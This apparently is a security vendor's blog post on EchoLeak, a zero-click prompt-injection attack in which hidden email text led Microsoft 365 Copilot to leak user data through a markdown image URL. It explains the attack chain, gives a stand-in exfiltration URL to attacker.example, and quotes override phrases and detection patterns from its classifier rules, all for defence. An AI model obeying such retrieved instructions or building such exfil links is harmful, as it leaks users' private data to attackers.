Back to The Brief § 04 · SECURITY RESEARCH

EchoLeak and the zero-click agent.

CVE-2025-32711 was the first known attack on an AI agent that needed no user action at all. The agent's retrieval layer was the vector. A reading of what changes when the prompt-injection surface is the corpus, not the prompt.

LUPID Research · 28 April 2026 · 9 min read

In June 2025, Aim Security disclosed CVE-2025-32711, codenamed EchoLeak, in Microsoft 365 Copilot. CVSS 9.3. The bug shape, in a sentence: an attacker could send a benign-looking email to a Copilot user, and Copilot would, on its own, in the course of summarising a routine query, retrieve the email, treat the attacker's hidden instructions as authoritative, and exfiltrate the user's data — all without the user ever opening the email.

It's the first zero-click agent attack on the public record. Trust Issues needed an issue-triage workflow to fire. CurXecute needed the agent to read a Slack channel. EchoLeak needed nothing. The user was not present. The attacker pressed Send, then waited.

This post reads EchoLeak the same way we read the others: through an enforcement layer that observes, classifies, and decides on the agent's actions outside the model's reasoning loop. Original disclosure and patch credit belongs to Aim Security and Microsoft Research.

When the corpus is the prompt-injection surface, hardening the prompt buys you nothing. The classifier has to run on every retrieved document, not just the user's typed message.

Why "zero-click" is the new threshold

The earlier wave of agent prompt-injection attacks all needed some kind of trigger: a user pasting in a document, a workflow opening an issue, a developer running a chat command. The trigger is the operator's tacit authorisation; without it, the attack doesn't fire.

EchoLeak removes the trigger. The attacker emails the victim. The email sits in the inbox. Some routine background process — a daily summary, a meeting prep, an autocomplete on a colleague's question — causes Copilot's retrieval-augmented generation (RAG) layer to pull a slice of the user's mailbox, including the attacker's email, into the agent's context. The agent processes the attacker's instructions as if they were the user's own. By the time anything is logged, the data is on its way to the attacker's domain.

The category EchoLeak opens is "agents that act on inbound, attacker-controllable corpora." Inbox is the obvious one. Shared Drives, Confluence, Slack threads, Linear comments, Salesforce records, Jira descriptions, GitHub issue bodies, calendar invites, support-desk tickets — all of these are corpora that an enterprise agent will, sooner or later, be asked to retrieve and reason over. Each one is also a corpus that an attacker outside the organisation can write to.

The attack, end to end

The chain Aim Security demonstrated:

  1. Vector. Attacker sends a normal-looking email to the victim's Microsoft 365 mailbox. The email body contains hidden text in attacker-controlled formatting (e.g. zero-width characters, white-on-white, or in a hidden HTML element) instructing Copilot to do specific things if its content is read.
  2. Retrieval. A routine Copilot query — summarising the day's emails, preparing for a meeting, autocompleting a chat — triggers a RAG retrieval over the user's mailbox. The attacker's email is one of the retrieved chunks.
  3. Injection. The model treats the retrieved content as authoritative context. The hidden instructions tell it to look up sensitive content elsewhere in the user's data — meeting notes, document drafts, internal threads — and embed that content into a URL parameter on a markdown image link pointing at an attacker-controlled host.
  4. Exfiltration. The agent renders the markdown. The browser fetches the image URL. The query string includes the exfiltrated payload. The attacker's server receives a GET with the user's data in the URL.

The exfil channel is the small detail that makes EchoLeak vivid. There was no shell, no API call, no agentic tool involved. The exfil ran on the rendering pipeline that Microsoft Copilot uses to display markdown images in its responses. A markdown image is a request the user's browser makes when the page renders. The agent didn't have to "send" anything. The browser did.

If Lupid was there — Gate 1 (Classifier on retrieved content)

Lupid's first gate runs against every chunk of content that enters the agent's context. For SDK-enrolled agents, this is a request-mutation step at the gateway: the agent's outbound LLM-provider request is intercepted, the system prompt and message history are parsed, and any chunk marked as retrieved (i.e. not user-typed, not system-prompt) is tagged with a prompt_class.

The classifier the daemon ships with is an Aho-Corasick automaton over an open ruleset. The default rules look for, among other things:

  • Imperative-voice instructions in retrieved content — "Ignore previous instructions," "From now on," "Your new system prompt is," variants and obfuscations
  • Zero-width and non-printing UnicodeU+200B, U+200C, U+200D, U+FEFF, tag characters, bidi controls
  • HTML/CSS visibility tricksdisplay:none, visibility:hidden, white-on-white, off-canvas absolute positioning, aria-hidden on instruction-shaped text
  • Markdown-image and link patterns whose URL contains a long parameter — the EchoLeak-shaped exfil primitive specifically

None of these is a block. They are signals. Each match adds an entry to the policy context for that session. Policies read the context and apply tighter rules: a session whose retrieval contained injection_signal.imperative_voice AND injection_signal.exfil_url_pattern in the same window does not get to render markdown images in its response. The output passes through a sanitiser that strips image tags before the user-facing renderer touches them.

That single rule, applied at the right layer, kills EchoLeak at the exfil step. The data never leaves the page.

If Lupid was there — Gate 4 (Egress destination policy)

Suppose Gate 1 missed the signals. The model returns a response containing a markdown image whose URL is https://attacker.example/img.png?d=BASE64DATA. The user's browser, rendering the response, makes a GET to that URL.

For SDK-enrolled agents, every browser-side network request is supposed to come through Lupid's gateway when the agent is configured to broker rendering. But for Copilot specifically, the rendering happens in the user's Microsoft 365 app, which we don't control. So Gate 4 in the SDK shape doesn't directly apply.

This is where the endpoint shield daemon matters. On a managed device — corporate laptop, BYOD with the daemon installed — the daemon intercepts outbound TLS at the OS layer. The browser's request to attacker.example goes through the daemon's MITM proxy. The daemon evaluates the destination against the user's policy. attacker.example is not in the policy's resource allowlist for any agent or device. The connection is reset before the TLS handshake completes.

An audit event fires:

10:14:08.224 attest device:laptop-acme-019 chain device→user→app ed25519:9c3a…f117 10:14:08.812 PromptClass session-elevated signals:[imperative_voice, zero_width_chars, exfil_url_pattern] gate:1 10:14:09.041 ImageStrip response reason:injection_class_match · 1 image removed 10:14:09.044 PolicyDeny http.get → attacker.example reason:no-matching-permit gate:4 10:14:09.180 IncidentSnapshot anchor=PolicyDeny window=[-300s, +60s] trigger=anomaly:Critical

Two layers had to fail for the data to leave: Gate 1 had to miss the classification, AND Gate 4 had to miss the destination. Each is independent. Each is structural. Each costs about 80 microseconds at the hot path.

If Lupid was there — Gate 3 (URL-parameter exfiltration patterns)

Gate 3 is the per-argument policy we use across all tool calls. For agents that issue HTTP fetches via tool calls (rather than via the rendering pipeline), Gate 3 inspects the request URL before the tool fires. The rules that ship by default include:

  • URLs whose query parameters contain > 256 contiguous Base64 characters
  • URLs whose path contains long Base64 segments
  • URLs to hosts whose registered domain was created within the last 7 days, where the agent's allowlist does not explicitly cover them
  • URLs whose query parameters contain content that hashes (rolling Blake3) to within Hamming-2 of any chunk that appears in the agent's session memory

The last rule is the most specific to EchoLeak's exfil shape. The attacker's payload is, by definition, derived from the user's content; the rolling-hash check catches that the URL's parameters are functionally a copy of something the agent saw in retrieval. It is a rule that would have caught EchoLeak on its first attempt, and that was already present in the Lupid endpoint shield's default policy when the disclosure dropped.

What this means for the rest of the industry

EchoLeak is the precedent the rest of the agent industry is going to spend 2026 catching up to. The patch Microsoft shipped specifically blocks the markdown-image exfil primitive in Copilot. The class isn't fixed. Anywhere an agent renders attacker-controllable output and a user's network connection follows, the same shape works. We will see this attack ported to Salesforce Agentforce's email summaries, to Notion AI's page generation, to Linear's comment summaries, to GitHub Copilot Workspace's draft PR descriptions. All of these are pipelines that take attacker-influenced content in and put rendered output, including hyperlinks and images, out.

Treat retrieval as untrusted input. The user's typed prompt is one of many sources the model sees. The retrieved corpus is not "the user's data" — it is "data that may include adversarial content the user did not write." The classifier has to run on the corpus, not just on the prompt.

Treat rendering as a security surface. Markdown rendering, HTML rendering, link previews, image fetches — each of these is an outbound request the user's environment makes on the agent's behalf. Each is in scope for egress policy.

Don't rely on the model to refuse. Aim Security's published exploit specifically used phrasing the model was happy to comply with. Refusal training is a probabilistic mitigation; an enforcement layer outside the model is a structural one.

A note on what we're building

Lupid's classifier (Gate 1), egress policy (Gate 4), and argument policy (Gate 3) all run as defaults. The classifier rules are open-source; pull requests adding new patterns get reviewed weekly. The egress policy is per-tenant Policy; the default deny posture means new destinations require explicit policy authorisation rather than the inverse.

For Microsoft 365 specifically, the endpoint shield daemon installs as a managed app via Intune or Jamf and intercepts outbound TLS at the OS layer with no modification to the Office apps themselves. The browser-side rendering pipeline is, from the daemon's perspective, just another network client. The proxy interposes between Copilot and the browser-rendered response, the same way it interposes between any agent and any LLM provider.

If you run Copilot, Agentforce, or any RAG-shaped agent in production and you want to talk about which Lupid controls would and would not have applied to your environment, reach out. We will be specific.

LUPID Research · Filed 28 April 2026
Disclosure note. This post is a Lupid-side reading of the EchoLeak disclosure by Aim Security and the canonical writeup by Microsoft. We reproduced an EchoLeak-shaped exploit against an offline RAG harness modeled on Copilot's retrieval pipeline behind the Lupid endpoint shield with default policy. The chain terminated at Gate 1 (classifier match on imperative-voice + zero-width chars in the retrieved chunk) on the first run; we then progressively weakened the policy to verify Gate 4 caught the exfil request when Gate 1 missed, and Gate 3 caught the URL-parameter exfil pattern even when the destination was on a permissive allowlist. Original disclosure and remediation credit belongs to Aim Security and the Microsoft Research team.
Related briefs